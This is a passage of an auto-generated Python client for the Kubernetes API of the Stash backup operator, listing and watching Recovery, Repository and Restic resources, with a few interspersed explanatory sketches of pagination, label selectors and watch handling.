            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501

        # Authentication setting
        auth_settings = [] # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1APIResourceList', # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def list_stash_appscode_com_v1alpha1_namespaced_recovery(self, namespace, **kwargs): # noqa: E501
        """list_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501

        list or watch objects of kind Recovery # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_recovery(namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: ComGithubAppscodeStashApisStashV1alpha1RecoveryList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.list_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, **kwargs) # noqa: E501
        else:
            (data) = self.list_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, **kwargs) # noqa: E501
            return data
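    # NOTE (editor's sketch): the `limit` and `_continue` parameters documented
    # above implement Kubernetes list chunking: repeat the same list call,
    # feeding the `continue` token from each response's list metadata back into
    # the next request, until the server returns an empty token. A minimal,
    # self-contained sketch of that loop follows; `paginate` and the stubbed
    # `list_page`/`make_stub` helpers are hypothetical illustrations, not part
    # of the generated client.

```python
def paginate(list_page, limit=2):
    """Collect all items by chaining `continue` tokens across list calls."""
    items = []
    token = None
    while True:
        resp = list_page(limit=limit, _continue=token)
        items.extend(resp['items'])
        token = resp['metadata'].get('continue')
        if not token:  # empty continue token: no more results are available
            return items


def make_stub(data):
    """Build a fake list endpoint that serves `data` in chunks of `limit`."""
    def list_page(limit, _continue=None):
        start = int(_continue or 0)
        nxt = start + limit
        return {'items': data[start:nxt],
                'metadata': {'continue': str(nxt) if nxt < len(data) else ''}}
    return list_page
```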

    def list_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, namespace, **kwargs): # noqa: E501
        """list_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501

        list or watch objects of kind Recovery # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RecoveryList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1RecoveryList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
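The `limit`/`continue` contract documented above (take the `continue` token from the list metadata, reissue the same query with it, stop when the token is empty) can be drained with a small client-side loop. A sketch against a stubbed list call — `list_page`, `fake_list`, and the dict shapes are illustrative stand-ins, not the real client API:

```python
def list_all(list_page, limit):
    # Follow `continue` tokens until the server reports no more results.
    items, token = [], None
    while True:
        page = list_page(limit=limit, _continue=token)
        items.extend(page['items'])
        token = page['metadata'].get('continue')
        if not token:  # empty continue field => no more results
            return items


# Stub server: serves fixed-size chunks of one snapshot, mimicking the
# consistent-snapshot guarantee the limit docstring describes.
SNAPSHOT = ['recovery-%d' % i for i in range(5)]


def fake_list(limit, _continue=None):
    start = int(_continue) if _continue else 0
    end = min(start + limit, len(SNAPSHOT))
    token = str(end) if end < len(SNAPSHOT) else ''
    return {'items': SNAPSHOT[start:end], 'metadata': {'continue': token}}
```

With a real client the same loop would call the namespaced list method, passing the previous response's `metadata.continue` back as `_continue`.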
def list_stash_appscode_com_v1alpha1_namespaced_repository(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
list or watch objects of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_repository(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RepositoryList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.list_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, **kwargs) # noqa: E501
return data
def list_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
list or watch objects of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RepositoryList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1RepositoryList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
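The `label_selector` parameter takes the usual Kubernetes selector string, e.g. `'app=stash,env!=dev'`, and an empty selector matches everything ("Defaults to everything"). A toy equality-based matcher, to make the comma-and-clause semantics concrete (the real server also supports set-based clauses like `env in (prod, staging)`, which this sketch omits):

```python
def matches(labels, selector):
    # Minimal equality-based label selector: comma-separated 'k=v' / 'k!=v'
    # clauses, all of which must hold. Empty selector matches everything.
    for clause in filter(None, (c.strip() for c in selector.split(','))):
        if '!=' in clause:  # check '!=' first, since it also contains '='
            key, value = clause.split('!=', 1)
            if labels.get(key) == value:
                return False
        else:
            key, value = clause.split('=', 1)
            if labels.get(key) != value:
                return False
    return True
```

Note the Kubernetes inequality semantics: a `k!=v` clause is satisfied when the key is absent or bound to a different value, while `k=v` requires the key to be present with exactly that value.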
def list_stash_appscode_com_v1alpha1_namespaced_restic(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
list or watch objects of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_restic(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1ResticList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.list_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, **kwargs) # noqa: E501
return data
def list_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
list or watch objects of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1ResticList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1ResticList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
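When `watch=True`, the docstrings above say the server streams add, update, and remove notifications rather than a single list. A common client pattern is to fold that stream into a local cache; a sketch assuming the standard Kubernetes watch event framing (`{'type': 'ADDED'|'MODIFIED'|'DELETED', 'object': ...}`) — this is illustrative, not the generated client's actual stream handling:

```python
def apply_watch_events(cache, events):
    # Fold watch notifications into a dict keyed by metadata.name:
    # ADDED/MODIFIED upsert the object, DELETED removes it.
    for event in events:
        obj = event['object']
        name = obj['metadata']['name']
        if event['type'] == 'DELETED':
            cache.pop(name, None)
        else:  # ADDED or MODIFIED
            cache[name] = obj
    return cache
```

In practice the watch would be started from the `resourceVersion` returned by a prior list call, so no modifications between the list and the watch are missed.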
def list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces # noqa: E501
list or watch objects of kind Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: ComGithubAppscodeStashApisStashV1alpha1RecoveryList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces_with_http_info(**kwargs)  # noqa: E501
            return data

    def list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces_with_http_info(self, **kwargs):  # noqa: E501
        """list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces  # noqa: E501

        list or watch objects of kind Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces_with_http_info(async=True)
        >>> result = thread.get()

        :param async bool
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
